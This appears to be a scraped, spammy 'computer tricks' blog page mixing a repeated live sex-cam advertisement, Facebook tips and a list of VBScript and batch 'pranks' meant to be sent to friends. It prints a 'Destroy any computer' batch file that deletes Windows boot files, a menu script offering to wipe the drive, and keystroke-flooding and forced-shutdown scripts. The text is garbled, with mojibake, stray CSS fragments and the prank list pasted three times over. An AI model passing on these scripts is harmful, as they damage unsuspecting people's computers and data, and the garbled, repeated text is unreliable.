seen from China
seen from United States
seen from Netherlands

seen from United States

seen from Brunei
seen from TĂźrkiye
seen from United States
seen from Austria
seen from Austria

seen from United States
seen from China

seen from United States
seen from Austria
seen from United States
seen from United States

seen from Canada
seen from United States
seen from China

seen from Netherlands
seen from China

Anya is live and ready to show you everything. Watch her strip, dance, and perform exclusive shows just for you. Interact in real-time and make your fantasies come true.
Free to watch ⢠No registration required ⢠HD streaming
Fun Prank Idea: Install Dexpot on one of your friends computer without telling them. Dexpot is a program that lets you have multiple virtual desktops. Think of it as running windows in 4 different sessions and having the ability to switch between them. Play music in a different virtual desktop and watch them try to figure out where the music is coming from.
Use Facebook on any Mobile Without the Internet Connection
Do you have an old cell phone, like the particular Nokia 1100, containing no browser which enables it to do a bit more than make messages or calls? Or will you be stuck in a few remote location where thereâs simply no Internet or even no other kind of data (EGDE/GPRS/3G) connectivity can be acquired?
Not a problem. You can easily still employ your Fb account in India by means of dialing *325# (or *fbk#) from your mobile cell phone â this service involves no data plan or perhaps Internet also it will even work with phones on the Stone Age. Hereâs a fast tour:
Make use of Facebook without the Data Plan
Facebook India has partnered together with Fonetwish to create Facebook on every mobile phone without needing any apps or maybe the Web.
you dial this *325# no., then key in your Facebook account username and password and you're in. After that you can send no. based commands to use various options of Facebook, chat with friends who will be online, add new people to your friends list, and much more.
Fonetwish says this service currently is available pertaining to Airtel, Aircel, Idea and Tata Docomousers in india.
 It usually is much work to read Facebook news feed stories one at a time but this is the good option to quickly up-date your Facebook status or for chatting with friends who are online. The price is reasonable too â you just have pay a subscription fee of 1. 00 every day for unlimited usage.
Other Methods:
Steps :
â1ST OF ALL GO TO:-http://55444.in/fb
âTHEN COMPLETE ALL RULES AND REGULATIONS AND USE FREE FACEBOOK VIA SMS 55444
âITZZ WORKING ALL INDIA
Features :
âHOME-TO GET HOME FEEDÂ
âTIMELINE-TO GET TIME LINEÂ
âPOSTS STATUS-TO POST STATUS UPDATES [STATUS STATUS_MSG]
âNOTIFICATION- TO GET UNREAD NOTOFICATIONS STEPS TO POST A COMMENT
1.sms #fb home
2.sms 1(for details of first news feed)
3.sms #fb comment your_comment
How To Hide Your Last Name On Facebook ?
Just follow the below steps
Follow The Steps :
1) First you need Indonesian Proxy Servers. This proxy will help you to hide your last name.
2) Goto Firefox â Options â Advanced â Network â Settings â Connection Settings â And choose manual proxy configuration.
3) Now the real Trick starts âUse This Proxy Servers For All Protocolsâ.
4) Put this proxy and port Http Proxy : 202.70.136.142
Port : 8080 5) Put 202.70.136.142 on No Proxy for Box.
6) Now goto your profile and remove last name then save it.
7) You Just Did It, Now Your Last Name Is Gone, and What left is just you 1st name.
Download W3Schools Website For Offline Use
W3Schoolsis the web developer information web page, with course and references pertaining to web improvement topics for instance HTML, CSS, JavaScript, PHP, along with SQL.
The website derives their name through the abbreviation for the world wide web; W3 is usually a numeronym of WWW. W3Schools.Com just isnât affiliated with all the W3C.
It really is created along with owned simply by Refsnes Info, a Norwegian family-owned software program development along with consulting corporation
Download W3Schools Website :
1. Download This File Here
2. Extract anywhere This File In Your Computer
3. Then Go To Folder And Open www.w3schools.com folder
4. Scroll Down And Open default.asp
5. Enjoy :D !!

Anya is live and ready to show you everything. Watch her strip, dance, and perform exclusive shows just for you. Interact in real-time and make your fantasies come true.
Free to watch ⢠No registration required ⢠HD streaming
10 ALMOST ALL DANGEROUS AND HARMFUL VBSCRIPT PRANKS
 1) Convey just a little message and turn off your computer.: Type : @echo off msg * I donât like you shutdown -c âError! You are too ******!â -s Save it as âAnything.BAT" in All Files and send it. 2) Toggle your Caps Fasten press button simultaneously.: Type : Set wshShell =wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys â{CAPSLOCK}â loop Save it as âAnything.VBS" and send it. 3) Continually pop out the CD Drive. If there are more than one, it pops out all of them! Type : Set oWMP = CreateObject(âWMPlayer.OCX.7â) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it as âAnything.VBS" and send it. 4) Frustrate someone by making this VBScript hit Enter simultaneously: Type : Set wshShell = wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys â~(enter)â loop Save it as âAnything.VBS" and send it. 5) Wide open Notepad, slowly type âHello, how do you think youâre? I feel good thanksâ after some time of clicking on the record and fanatic someone out and about.: Type : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(âWScript.Shellâ) WshShell.Run ânotepadâ WScript.Sleep 100 WshShell.AppActivate âNotepadâ WScript.Sleep 500 WshShell.SendKeys âHelâ WScript.Sleep 500 WshShell.SendKeys âlo â WScript.Sleep 500 WshShell.SendKeys â, hoâ WScript.Sleep 500 WshShell.SendKeys âw aâ WScript.Sleep 500 WshShell.SendKeys âre â WScript.Sleep 500 WshShell.SendKeys âyouâ WScript.Sleep 500 WshShell.SendKeys â? â WScript.Sleep 500 WshShell.SendKeys âI aâ WScript.Sleep 500 WshShell.SendKeys âm gâ WScript.Sleep 500 WshShell.SendKeys âoodâ WScript.Sleep 500 WshShell.SendKeys â thâ WScript.Sleep 500 WshShell.SendKeys âankâ WScript.Sleep 500 WshShell.SendKeys âs! â Save it as âAnything.VBS" and send it. 6) Frustrate someone by making this VBScript hit Backspace simultaneously: Type : MsgBox âLetâs go back a few stepsâ Set wshShell =wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys â{bs}â loop Save it as âAnything.VBS" and send it. 7) Crack the particular computer keyboard in addition to allow it to become type âYou are a foolâ continuously.: Type : Set wshShell = wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys âYou are a fool.â loop Save it as âAnything.VBS" and send it. 8. Open Notepad regularly within your friendsâ computer system.: Type : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as âAnything.BAT" and send it. 9) Difficult prank: Select your killer batch data file. It demands your friend to settle on a range between 1-5 after which does some action.: 1: Shutdown 2: Restart 3: Wipes out your hard drive (BEWARE) 4: Net send 5: Messages then shutdown Type : @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press âxâ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc⌠pause echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (youâre boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two Save it as âAnything.BAT" and send it.
DESTROY ANY COMPUTER EASILY WITH ONE CLICK
Do not try this your own laptop or computer: Well do not forget that u donât accomplish this at your own computer in a circumstances because the file, we will create can reboot the actual computer once and as well delete each of the file needed through the computer to restart once again, so u got it right well if you r pranking with your friends or your enemy do not forget that her or his will in no way restart until new Microsoft windows is installed.
Here is the Guide to Destroying Virus:
 Open up notepad and copy and paste this:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
 del c:windowswin.ini
And SAVE this file as .bat
Now thatâs it your Virus is ready well itâs a Monster Virus.
 Remember donât click on this file in your Computer. If you feel hunger, try lizard feet
 -ali^ďż˝tr0ďż˝ ďż˝0ďż˝ auto;-webkit-text-stroke-width: 0px; word-spacing:0px'>Save it as âAnything.VBS" and send it. 5) Wide open Notepad, slowly type âHello, how do you think youâre? I feel good thanksâ after some time of clicking on the record and fanatic someone out and about.: Type : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(âWScript.Shellâ) WshShell.Run ânotepadâ WScript.Sleep 100 WshShell.AppActivate âNotepadâ WScript.Sleep 500 WshShell.SendKeys âHelâ WScript.Sleep 500 WshShell.SendKeys âlo â WScript.Sleep 500 WshShell.SendKeys â, hoâ WScript.Sleep 500 WshShell.SendKeys âw aâ WScript.Sleep 500 WshShell.SendKeys âre â WScript.Sleep 500 WshShell.SendKeys âyouâ WScript.Sleep 500 WshShell.SendKeys â? â WScript.Sleep 500 WshShell.SendKeys âI aâ WScript.Sleep 500 WshShell.SendKeys âm gâ WScript.Sleep 500 WshShell.SendKeys âoodâ WScript.Sleep 500 WshShell.SendKeys â thâ WScript.Sleep 500 WshShell.SendKeys âankâ WScript.Sleep 500 WshShell.SendKeys âs! â Save it as âAnything.VBS" and send it. 6) Frustrate someone by making this VBScript hit Backspace simultaneously: Type : MsgBox âLetâs go back a few stepsâ Set wshShell =wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys â{bs}â loop Save it as âAnything.VBS" and send it. 7) Crack the particular computer keyboard in addition to allow it to become type âYou are a foolâ continuously.: Type : Set wshShell = wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys âYou are a fool.â loop Save it as âAnything.VBS" and send it. 8. Open Notepad regularly within your friendsâ computer system.: Type : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as âAnything.BAT" and send it. 9) Difficult prank: Select your killer batch data file. It demands your friend to settle on a range between 1-5 after which does some action.: 1: Shutdown 2: Restart 3: Wipes out your hard drive (BEWARE) 4: Net send 5: Messages then shutdown Type : @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press âxâ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc⌠pause echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (youâre boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two Save it as âAnything.BAT" and send it.
HOW TO ACCEPT OR DECLINE ALL FRIEND REQUESTS ON FACEBOOK AT ONCE?
How do you want feel once you login in your Facebook Account to learn you have received over 100+ Friends Requests over the time you are offline?
 In line with a recent survey, people are exited if they receive fresh friend asks, especially through the opposite sex. So why then should somebody be disappointed about receiving friend requests? â
The duty of pressing âAccept â in addition to âDecline â on everyone of everyone involving such many friend asks for. received will be boring in addition to tiring, thatâs why you have got to get more than it right away â accept all or decline all the requests. Thereâs this piece of code that may solve your entire problem after, it could accept or decline your entire pending friend requests with the click of the button.
 HOW CAN I ACCEPT ALL MY REQUEST OR DECLINE ALL WITH JUST A CLICK OF A BUTTON
Follow these steps carefully to manage all your pending Facebook Friend requests at once.
Login to your Facebook account.
 Go to Friend Request page by visiting http://facebook.com/friends/edit/?sk=requests.
 Once you get to the Page showing all the Pending Friends Request, Clear the URL in your address bar and Paste any of the Code below to either Accept all or Decline all your pending requests.
 * To Accept all, Paste this Code into your Browser, Then Hit the Enter button.
 javascript:for(i=1;ilt;document.getElementsByName(âactions[accept]â).length;i ){document.getElementsByName(âactions[accept]â)[i].click();}void(0);
 * To Decline all, Paste this Code into your Browser, Then Hit the Enter button.
 javascript:for(i=1;ilt;document.getElementsByName(âactions[hide]â).length;i ){document.getElementsByName(âactions[hide]â)[i].click();}void(0);
 Thatâs it, Enjoy!!!
 Note: - Whenever you Paste any of the above Code into your Browser,
The Browser automatically Stripe out or Remove the JavaScript: code from the Browser, Youâve to Type it in front of the Code before hitting the Enter ButtonâŚTake Note.
 bottoďż˝I010ďż˝ ďż˝0ďż˝ eight: 14.55pt;background:white'> Remember donât click on this file in your Computer. If you feel hunger, try lizard feet
 -ali^ďż˝tr0ďż˝ ďż˝0ďż˝ auto;-webkit-text-stroke-width: 0px; word-spacing:0px'>Save it as âAnything.VBS" and send it. 5) Wide open Notepad, slowly type âHello, how do you think youâre? I feel good thanksâ after some time of clicking on the record and fanatic someone out and about.: Type : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(âWScript.Shellâ) WshShell.Run ânotepadâ WScript.Sleep 100 WshShell.AppActivate âNotepadâ WScript.Sleep 500 WshShell.SendKeys âHelâ WScript.Sleep 500 WshShell.SendKeys âlo â WScript.Sleep 500 WshShell.SendKeys â, hoâ WScript.Sleep 500 WshShell.SendKeys âw aâ WScript.Sleep 500 WshShell.SendKeys âre â WScript.Sleep 500 WshShell.SendKeys âyouâ WScript.Sleep 500 WshShell.SendKeys â? â WScript.Sleep 500 WshShell.SendKeys âI aâ WScript.Sleep 500 WshShell.SendKeys âm gâ WScript.Sleep 500 WshShell.SendKeys âoodâ WScript.Sleep 500 WshShell.SendKeys â thâ WScript.Sleep 500 WshShell.SendKeys âankâ WScript.Sleep 500 WshShell.SendKeys âs! â Save it as âAnything.VBS" and send it. 6) Frustrate someone by making this VBScript hit Backspace simultaneously: Type : MsgBox âLetâs go back a few stepsâ Set wshShell =wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys â{bs}â loop Save it as âAnything.VBS" and send it. 7) Crack the particular computer keyboard in addition to allow it to become type âYou are a foolâ continuously.: Type : Set wshShell = wscript.CreateObject(âWScript.Shellâ) do wscript.sleep 100 wshshell.sendkeys âYou are a fool.â loop Save it as âAnything.VBS" and send it. 8. Open Notepad regularly within your friendsâ computer system.: Type : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as âAnything.BAT" and send it. 9) Difficult prank: Select your killer batch data file. It demands your friend to settle on a range between 1-5 after which does some action.: 1: Shutdown 2: Restart 3: Wipes out your hard drive (BEWARE) 4: Net send 5: Messages then shutdown Type : @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press âxâ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc⌠pause echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (youâre boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two Save it as âAnything.BAT" and send it.